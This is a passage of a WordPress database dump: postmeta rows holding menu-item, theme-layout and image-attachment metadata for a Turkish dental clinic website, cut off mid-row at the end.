(4205, 6386, 'us_grid_layout_ids', ''),
(4206, 6386, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4207, 6386, '_menu_item_type', 'post_type'),
(4208, 6386, '_menu_item_menu_item_parent', '6320'),
(4209, 6386, '_menu_item_object_id', '6383'),
(4210, 6386, '_menu_item_object', 'us_portfolio'),
(4211, 6386, '_menu_item_target', ''),
(4212, 6386, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4213, 6386, '_menu_item_xfn', ''),
(4214, 6386, '_menu_item_url', ''),
(4216, 6387, 'us_og_image', ''),
(4217, 6387, 'us_grid_layout_ids', ''),
(4218, 6387, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4219, 6387, '_menu_item_type', 'post_type'),
(4220, 6387, '_menu_item_menu_item_parent', '6320'),
(4221, 6387, '_menu_item_object_id', '6379'),
(4222, 6387, '_menu_item_object', 'us_portfolio'),
(4223, 6387, '_menu_item_target', ''),
(4224, 6387, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4225, 6387, '_menu_item_xfn', ''),
(4226, 6387, '_menu_item_url', ''),
(4228, 6388, 'us_og_image', ''),
(4229, 6388, 'us_grid_layout_ids', ''),
(4230, 6388, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4231, 6388, '_menu_item_type', 'post_type'),
(4232, 6388, '_menu_item_menu_item_parent', '6320'),
(4233, 6388, '_menu_item_object_id', '6376'),
(4234, 6388, '_menu_item_object', 'us_portfolio'),
(4235, 6388, '_menu_item_target', ''),
(4236, 6388, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4237, 6388, '_menu_item_xfn', ''),
(4238, 6388, '_menu_item_url', ''),
(4240, 6389, 'us_og_image', ''),
(4241, 6389, 'us_grid_layout_ids', ''),
(4242, 6389, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4243, 6389, '_menu_item_type', 'post_type'),
(4244, 6389, '_menu_item_menu_item_parent', '6320'),
(4245, 6389, '_menu_item_object_id', '6373'),
(4246, 6389, '_menu_item_object', 'us_portfolio'),
(4247, 6389, '_menu_item_target', ''),
(4248, 6389, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4249, 6389, '_menu_item_xfn', ''),
(4250, 6389, '_menu_item_url', ''),
(4252, 6390, 'us_og_image', ''),
(4253, 6390, 'us_grid_layout_ids', ''),
(4254, 6390, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4255, 6391, '_wp_attached_file', '2018/07/cene-eklem.jpg'),
(4256, 6391, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:22:\"2018/07/cene-eklem.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"cene-eklem-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"cene-eklem-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:22:\"cene-eklem-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:22:\"cene-eklem-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:22:\"cene-eklem-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4257, 6390, '_edit_last', '1'),
(4258, 6390, '_edit_lock', '1531738708:1'),
(4259, 6390, '_thumbnail_id', '6391'),
(4260, 6390, 'slide_template', 'default'),
(4261, 6390, '_wpb_vc_js_status', 'true'),
(4262, 6390, 'us_header', ''),
(4263, 6390, 'us_header_id', ''),
(4264, 6390, 'us_header_sticky_override', '0'),
(4265, 6390, 'us_header_transparent_override', '0'),
(4266, 6390, 'us_header_shadow', '0'),
(4267, 6390, 'us_header_sticky_pos', ''),
(4268, 6390, 'us_titlebar', ''),
(4269, 6390, 'us_titlebar_subtitle', ''),
(4270, 6390, 'us_titlebar_size', ''),
(4271, 6390, 'us_titlebar_color', ''),
(4272, 6390, 'us_titlebar_breadcrumbs', ''),
(4273, 6390, 'us_titlebar_image', ''),
(4274, 6390, 'us_titlebar_bg_size', ''),
(4275, 6390, 'us_titlebar_bg_repeat', ''),
(4276, 6390, 'us_titlebar_bg_position', ''),
(4277, 6390, 'us_titlebar_bg_parallax', ''),
(4278, 6390, 'us_titlebar_overlay_color', ''),
(4279, 6390, 'us_sidebar', ''),
(4280, 6390, 'us_sidebar_id', 'default_sidebar'),
(4281, 6390, 'us_sidebar_pos', 'right'),
(4282, 6390, 'us_footer', ''),
(4283, 6390, 'us_footer_id', 'default-footer'),
(4284, 6390, 'us_tile_bg_color', ''),
(4285, 6390, 'us_tile_text_color', ''),
(4286, 6390, 'us_tile_size', '1x1'),
(4287, 6390, 'us_tile_link', '{\"url\":\"\",\"target\":\"\"}'),
(4288, 6390, 'us_tile_additional_image', ''),
(4289, 6393, 'us_og_image', ''),
(4290, 6393, 'us_grid_layout_ids', ''),
(4291, 6393, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4292, 6393, '_menu_item_type', 'post_type'),
(4293, 6393, '_menu_item_menu_item_parent', '6156'),
(4294, 6393, '_menu_item_object_id', '6390'),
(4295, 6393, '_menu_item_object', 'us_portfolio'),
(4296, 6393, '_menu_item_target', ''),
(4297, 6393, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4298, 6393, '_menu_item_xfn', ''),
(4299, 6393, '_menu_item_url', ''),
(4301, 6394, 'us_og_image', ''),
(4302, 6394, 'us_grid_layout_ids', ''),
(4303, 6394, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4304, 6394, '_edit_last', '1'),
(4305, 6394, '_edit_lock', '1531739060:1'),
(4306, 6395, '_wp_attached_file', '2018/07/kist-operasyonu.jpg'),
(4307, 6395, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:27:\"2018/07/kist-operasyonu.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"kist-operasyonu-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"kist-operasyonu-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:27:\"kist-operasyonu-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:27:\"kist-operasyonu-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:27:\"kist-operasyonu-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4308, 6394, '_thumbnail_id', '6395'),
(4309, 6394, 'slide_template', 'default'),
(4310, 6394, '_wpb_vc_js_status', 'true'),
(4311, 6394, 'us_header', ''),
(4312, 6394, 'us_header_id', ''),
(4313, 6394, 'us_header_sticky_override', '0'),
(4314, 6394, 'us_header_transparent_override', '0'),
(4315, 6394, 'us_header_shadow', '0'),
(4316, 6394, 'us_header_sticky_pos', ''),
(4317, 6394, 'us_titlebar', ''),
(4318, 6394, 'us_titlebar_subtitle', ''),
(4319, 6394, 'us_titlebar_size', ''),
(4320, 6394, 'us_titlebar_color', ''),
(4321, 6394, 'us_titlebar_breadcrumbs', ''),
(4322, 6394, 'us_titlebar_image', ''),
(4323, 6394, 'us_titlebar_bg_size', ''),
(4324, 6394, 'us_titlebar_bg_repeat', ''),
(4325, 6394, 'us_titlebar_bg_position', ''),
(4326, 6394, 'us_titlebar_bg_parallax', ''),
(4327, 6394, 'us_titlebar_overlay_color', ''),
(4328, 6394, 'us_sidebar', ''),
(4329, 6394, 'us_sidebar_id', 'default_sidebar'),
(4330, 6394, 'us_sidebar_pos', 'right'),
(4331, 6394, 'us_footer', ''),
(4332, 6394, 'us_footer_id', 'default-footer'),
(4333, 6394, 'us_tile_bg_color', ''),
(4334, 6394, 'us_tile_text_color', ''),
(4335, 6394, 'us_tile_size', '1x1'),
(4336, 6394, 'us_tile_link', '{\"url\":\"\",\"target\":\"\"}'),
(4337, 6394, 'us_tile_additional_image', ''),
(4338, 6397, 'us_og_image', ''),
(4339, 6397, 'us_grid_layout_ids', ''),
(4340, 6397, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4341, 6397, '_edit_last', '1'),
(4342, 6397, '_edit_lock', '1531935396:1'),
(4343, 6398, '_wp_attached_file', '2018/07/20-yas.jpg'),
(4344, 6398, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:18:\"2018/07/20-yas.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"20-yas-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"20-yas-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:18:\"20-yas-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:18:\"20-yas-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:18:\"20-yas-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4345, 6397, '_thumbnail_id', '6398'),
(4346, 6397, 'slide_template', 'default'),
(4347, 6397, '_wpb_vc_js_status', 'true'),
(4348, 6397, 'us_header', ''),
(4349, 6397, 'us_header_id', ''),
(4350, 6397, 'us_header_sticky_override', '0'),
(4351, 6397, 'us_header_transparent_override', '0'),
(4352, 6397, 'us_header_shadow', '0'),
(4353, 6397, 'us_header_sticky_pos', ''),
(4354, 6397, 'us_titlebar', ''),
(4355, 6397, 'us_titlebar_subtitle', ''),
(4356, 6397, 'us_titlebar_size', ''),
(4357, 6397, 'us_titlebar_color', ''),
(4358, 6397, 'us_titlebar_breadcrumbs', ''),
(4359, 6397, 'us_titlebar_image', ''),
(4360, 6397, 'us_titlebar_bg_size', ''),
(4361, 6397, 'us_titlebar_bg_repeat', ''),
(4362, 6397, 'us_titlebar_bg_position', ''),
(4363, 6397, 'us_titlebar_bg_parallax', ''),
(4364, 6397, 'us_titlebar_overlay_color', ''),
(4365, 6397, 'us_sidebar', ''),
(4366, 6397, 'us_sidebar_id', 'default_sidebar'),
(4367, 6397, 'us_sidebar_pos', 'right'),
(4368, 6397, 'us_footer', ''),
(4369, 6397, 'us_footer_id', 'site-footer'),
(4370, 6397, 'us_tile_bg_color', ''),
(4371, 6397, 'us_tile_text_color', ''),
(4372, 6397, 'us_tile_size', '1x1'),
(4373, 6397, 'us_tile_link', '{\"url\":\"\",\"target\":\"\"}'),
(4374, 6397, 'us_tile_additional_image', ''),
(4375, 6400, 'us_og_image', ''),
(4376, 6400, 'us_grid_layout_ids', ''),
(4377, 6400, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4378, 6400, '_edit_last', '1'),
(4379, 6400, '_edit_lock', '1531936660:1'),
(4380, 6401, '_wp_attached_file', '2018/07/dis-cekimi.jpg'),
(4381, 6401, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:22:\"2018/07/dis-cekimi.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"dis-cekimi-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"dis-cekimi-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:22:\"dis-cekimi-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:22:\"dis-cekimi-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:22:\"dis-cekimi-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4382, 6400, '_thumbnail_id', '6401'),
(4383, 6400, 'slide_template', 'default'),
(4384, 6400, '_wpb_vc_js_status', 'true'),
(4385, 6400, 'us_header', ''),
(4386, 6400, 'us_header_id', ''),
(4387, 6400, 'us_header_sticky_override', '0'),
(4388, 6400, 'us_header_transparent_override', '0'),
(4389, 6400, 'us_header_shadow', '0'),
(4390, 6400, 'us_header_sticky_pos', ''),
(4391, 6400, 'us_titlebar', ''),
(4392, 6400, 'us_titlebar_subtitle', ''),
(4393, 6400, 'us_titlebar_size', ''),
(4394, 6400, 'us_titlebar_color', ''),
(4395, 6400, 'us_titlebar_breadcrumbs', ''),
(4396, 6400, 'us_titlebar_image', ''),
(4397, 6400, 'us_titlebar_bg_size', ''),
(4398, 6400, 'us_titlebar_bg_repeat', ''),
(4399, 6400, 'us_titlebar_bg_position', ''),
(4400, 6400, 'us_titlebar_bg_parallax', ''),
(4401, 6400, 'us_titlebar_overlay_color', ''),
(4402, 6400, 'us_sidebar', ''),
(4403, 6400, 'us_sidebar_id', 'default_sidebar'),
(4404, 6400, 'us_sidebar_pos', 'right'),
(4405, 6400, 'us_footer', ''),
(4406, 6400, 'us_footer_id', 'site-footer'),
(4407, 6400, 'us_tile_bg_color', ''),
(4408, 6400, 'us_tile_text_color', ''),
(4409, 6400, 'us_tile_size', '1x1'),
(4410, 6400, 'us_tile_link', '{\"url\":\"\",\"target\":\"\"}'),
(4411, 6400, 'us_tile_additional_image', ''),
(4412, 6403, 'us_og_image', ''),
(4413, 6403, 'us_grid_layout_ids', ''),
(4414, 6403, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4415, 6403, '_menu_item_type', 'post_type'),
(4416, 6403, '_menu_item_menu_item_parent', '6321'),
(4417, 6403, '_menu_item_object_id', '6400'),
(4418, 6403, '_menu_item_object', 'us_portfolio'),
(4419, 6403, '_menu_item_target', ''),
(4420, 6403, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4421, 6403, '_menu_item_xfn', ''),
(4422, 6403, '_menu_item_url', ''),
(4424, 6404, 'us_og_image', ''),
(4425, 6404, 'us_grid_layout_ids', ''),
(4426, 6404, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4427, 6404, '_menu_item_type', 'post_type'),
(4428, 6404, '_menu_item_menu_item_parent', '6321'),
(4429, 6404, '_menu_item_object_id', '6397'),
(4430, 6404, '_menu_item_object', 'us_portfolio'),
(4431, 6404, '_menu_item_target', ''),
(4432, 6404, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4433, 6404, '_menu_item_xfn', ''),
(4434, 6404, '_menu_item_url', ''),
(4436, 6405, 'us_og_image', ''),
(4437, 6405, 'us_grid_layout_ids', ''),
(4438, 6405, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4439, 6405, '_menu_item_type', 'post_type'),
(4440, 6405, '_menu_item_menu_item_parent', '6321'),
(4441, 6405, '_menu_item_object_id', '6394'),
(4442, 6405, '_menu_item_object', 'us_portfolio'),
(4443, 6405, '_menu_item_target', ''),
(4444, 6405, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4445, 6405, '_menu_item_xfn', ''),
(4446, 6405, '_menu_item_url', ''),
(4448, 6406, 'us_og_image', ''),
(4449, 6406, 'us_grid_layout_ids', ''),
(4450, 6406, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4451, 6406, '_edit_last', '1'),
(4452, 6406, '_edit_lock', '1531936542:1'),
(4453, 6407, '_wp_attached_file', '2018/07/agiz-hastaliklari.jpg'),
(4454, 6407, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/07/agiz-hastaliklari.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"agiz-hastaliklari-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"agiz-hastaliklari-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:29:\"agiz-hastaliklari-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:29:\"agiz-hastaliklari-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:29:\"agiz-hastaliklari-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4455, 6406, '_thumbnail_id', '6407'),
(4456, 6406, 'slide_template', 'default'),
(4457, 6406, '_wpb_vc_js_status', 'true'),
(4458, 6406, 'us_header', ''),
(4459, 6406, 'us_header_id', ''),
(4460, 6406, 'us_header_sticky_override', '0'),
(4461, 6406, 'us_header_transparent_override', '0'),
(4462, 6406, 'us_header_shadow', '0'),
(4463, 6406, 'us_header_sticky_pos', ''),
(4464, 6406, 'us_titlebar', ''),
(4465, 6406, 'us_titlebar_subtitle', ''),
(4466, 6406, 'us_titlebar_size', ''),
(4467, 6406, 'us_titlebar_color', ''),
(4468, 6406, 'us_titlebar_breadcrumbs', ''),
(4469, 6406, 'us_titlebar_image', ''),
(4470, 6406, 'us_titlebar_bg_size', ''),
(4471, 6406, 'us_titlebar_bg_repeat', ''),
(4472, 6406, 'us_titlebar_bg_position', ''),
(4473, 6406, 'us_titlebar_bg_parallax', ''),
(4474, 6406, 'us_titlebar_overlay_color', ''),
(4475, 6406, 'us_sidebar', ''),
(4476, 6406, 'us_sidebar_id', 'default_sidebar'),
(4477, 6406, 'us_sidebar_pos', 'right'),
(4478, 6406, 'us_footer', ''),
(4479, 6406, 'us_footer_id', 'site-footer'),
(4480, 6406, 'us_tile_bg_color', ''),
(4481, 6406, 'us_tile_text_color', ''),
(4482, 6406, 'us_tile_size', '1x1'),
(4483, 6406, 'us_tile_link', '{\"url\":\"\",\"target\":\"\"}'),
(4484, 6406, 'us_tile_additional_image', ''),
(4485, 6409, 'us_og_image', ''),
(4486, 6409, 'us_grid_layout_ids', ''),
(4487, 6409, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4488, 6409, '_edit_last', '1'),
(4489, 6409, '_edit_lock', '1531742070:1'),
(4490, 6410, '_wp_attached_file', '2018/07/radyoloji.jpg'),
(4491, 6410, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:21:\"2018/07/radyoloji.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"radyoloji-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"radyoloji-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:21:\"radyoloji-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:21:\"radyoloji-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:21:\"radyoloji-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4492, 6409, '_thumbnail_id', '6410'),
(4493, 6409, 'slide_template', 'default'),
(4494, 6409, '_wpb_vc_js_status', 'true'),
(4495, 6409, 'us_header', ''),
(4496, 6409, 'us_header_id', ''),
(4497, 6409, 'us_header_sticky_override', '0'),
(4498, 6409, 'us_header_transparent_override', '0'),
(4499, 6409, 'us_header_shadow', '0'),
(4500, 6409, 'us_header_sticky_pos', ''),
(4501, 6409, 'us_titlebar', ''),
(4502, 6409, 'us_titlebar_subtitle', ''),
(4503, 6409, 'us_titlebar_size', ''),
(4504, 6409, 'us_titlebar_color', ''),
(4505, 6409, 'us_titlebar_breadcrumbs', ''),
(4506, 6409, 'us_titlebar_image', ''),
(4507, 6409, 'us_titlebar_bg_size', ''),
(4508, 6409, 'us_titlebar_bg_repeat', ''),
(4509, 6409, 'us_titlebar_bg_position', ''),
(4510, 6409, 'us_titlebar_bg_parallax', ''),
(4511, 6409, 'us_titlebar_overlay_color', ''),
(4512, 6409, 'us_sidebar', ''),
(4513, 6409, 'us_sidebar_id', 'default_sidebar'),
(4514, 6409, 'us_sidebar_pos', 'right'),
(4515, 6409, 'us_footer', ''),
(4516, 6409, 'us_footer_id', 'default-footer'),
(4517, 6409, 'us_tile_bg_color', ''),
(4518, 6409, 'us_tile_text_color', ''),
(4519, 6409, 'us_tile_size', '1x1'),
(4520, 6409, 'us_tile_link', '{\"url\":\"\",\"target\":\"\"}'),
(4521, 6409, 'us_tile_additional_image', ''),
(4522, 6412, 'us_og_image', ''),
(4523, 6412, 'us_grid_layout_ids', ''),
(4524, 6412, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4525, 6412, '_menu_item_type', 'post_type'),
(4526, 6412, '_menu_item_menu_item_parent', '6156'),
(4527, 6412, '_menu_item_object_id', '6409'),
(4528, 6412, '_menu_item_object', 'us_portfolio'),
(4529, 6412, '_menu_item_target', ''),
(4530, 6412, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4531, 6412, '_menu_item_xfn', ''),
(4532, 6412, '_menu_item_url', ''),
(4534, 6413, 'us_og_image', ''),
(4535, 6413, 'us_grid_layout_ids', ''),
(4536, 6413, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4537, 6413, '_menu_item_type', 'post_type'),
(4538, 6413, '_menu_item_menu_item_parent', '6156'),
(4539, 6413, '_menu_item_object_id', '6406'),
(4540, 6413, '_menu_item_object', 'us_portfolio'),
(4541, 6413, '_menu_item_target', ''),
(4542, 6413, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4543, 6413, '_menu_item_xfn', ''),
(4544, 6413, '_menu_item_url', ''),
(4546, 8, '_edit_lock', '1533126278:1'),
(4547, 8, 'slide_template', 'default'),
(4548, 8, '_wpb_vc_js_status', 'true'),
(4550, 6416, 'us_og_image', ''),
(4551, 6416, 'us_grid_layout_ids', ''),
(4552, 6416, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4553, 6416, '_edit_lock', '1531743295:1'),
(4554, 6416, 'slide_template', ''),
(4555, 6379, '_thumbnail_id', '6418'),
(4556, 6417, '_wp_attached_file', '2018/07/anasayfa-back.jpg'),
(4557, 6417, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:600;s:4:\"file\";s:25:\"2018/07/anasayfa-back.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"anasayfa-back-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"anasayfa-back-300x94.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"anasayfa-back-1024x320.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:25:\"anasayfa-back-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:25:\"anasayfa-back-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:25:\"anasayfa-back-600x188.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:25:\"anasayfa-back-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s: